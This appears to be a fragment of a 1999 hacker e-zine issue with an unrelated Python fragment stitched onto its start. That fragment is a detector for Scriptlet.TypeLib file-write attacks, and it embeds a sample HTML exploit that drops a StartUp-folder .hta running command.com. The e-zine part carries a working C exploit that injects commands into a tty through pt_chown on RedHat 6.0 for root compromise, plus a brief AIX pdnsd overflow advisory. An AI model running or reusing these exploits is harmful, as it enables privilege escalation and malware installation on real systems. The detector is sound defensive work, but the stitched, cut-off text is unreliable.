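SCRIPTLET_TYPELIB_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"
WSCRIPT_SHELL_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"

_TAG_RE = re.compile(r"<object\b([^>]*)>", re.I | re.S)
_ATTR_RE = re.compile(r"\b(id|classid)\s*=\s*['\"]?([^'\"\s>]+)", re.I)
_PATH_RE = re.compile(r"\b(\w+)\s*\.\s*Path\s*=\s*['\"]([^'\"]*)['\"]", re.I)
_WRITE_RE = re.compile(r"\b(\w+)\s*\.\s*write\s*\(", re.I)


def find_typelib_writes(html):
    """Return one finding per Scriptlet.TypeLib object that is asked to write a file."""
    bound = {}  # object id -> CLSID it is bound to
    for tag in _TAG_RE.finditer(html):
        attrs = {k.lower(): v for k, v in _ATTR_RE.findall(tag.group(1))}
        if "id" in attrs and "classid" in attrs:
            clsid = attrs["classid"].upper().replace("CLSID:", "").strip("{}")
            bound[attrs["id"]] = clsid
    typelib_ids = {i for i, c in bound.items() if c == SCRIPTLET_TYPELIB_CLSID}
    if not typelib_ids:
        return []
    paths = {m.group(1): m.group(2) for m in _PATH_RE.finditer(html)}
    writers = {m.group(1) for m in _WRITE_RE.finditer(html)}
    findings = []
    for oid in sorted(typelib_ids & writers):  # control present AND .write() called on it
        target = paths.get(oid, "")
        findings.append({
            "object_id": oid,
            "target": target,
            # the advisory's payload shape: an .hta dropped into the StartUp folder
            "startup_folder": "startup" in target.lower(),
            "hta": target.lower().endswith(".hta"),
            "wsh_embedded": WSCRIPT_SHELL_CLSID in html.upper(),
        })
    return findings


# Constructed samples: a copy of the advisory's snippet, and a benign page with a placeholder CLSID.
SAMPLE_EXPLOIT = r"""<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>"""
SAMPLE_BENIGN = r"""<object id="player" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<SCRIPT>document.write("hello");</SCRIPT>"""
```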
------------------------------


2.02 -)rh60.pt_chown.root.c.txt(- 8.23.99

/* pt_chown for RedHat 6.0 has a vulnerability that can lead to
   a root compromise.
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

int main(int a, char* b[]) {

    char* c = "\nclear;echo huhuhu, it worked...;id;sleep 2\n";
    int i = 0, x;

    /* Expect writable, allocated (eg. by screen) /dev/ttyXX as 1st arg */
    if (a < 2) {
        fprintf(stderr, "usage: %s /dev/ttyXX\n", b[0]);
        exit(1);
    }
    x = open(b[1], O_WRONLY);
    if (x < 0) {
        perror(b[1]);
        exit(1);
    }

    if (!fork()) {
        /* child: hand the tty to pt_chown on fd 3, where it expects a pty slave */
        dup2(x, 3);
        execl("/usr/libexec/pt_chown", "pt_chown", (char *)0);
        perror("pt_chown");
        exit(1);
    }
    sleep(1);
    /* parent: 0x5412 is TIOCSTI; each byte is pushed into the tty's input queue */
    for (; i < strlen(c); i++) ioctl(x, 0x5412, &c[i]);

    return 0;
}

------------------------------


2.03 -)aix.pdnsd.bof.txt(- 8.18.99

A buffer overflow vulnerability has been discovered in the Source Code Browser's
Program Database Name Server Daemon (pdnsd) of versions 2 and 3 of IBM's C Set ++ for AIX.
This vulnerability allows local and remote users to gain root access.

------------------------------



_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|

All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
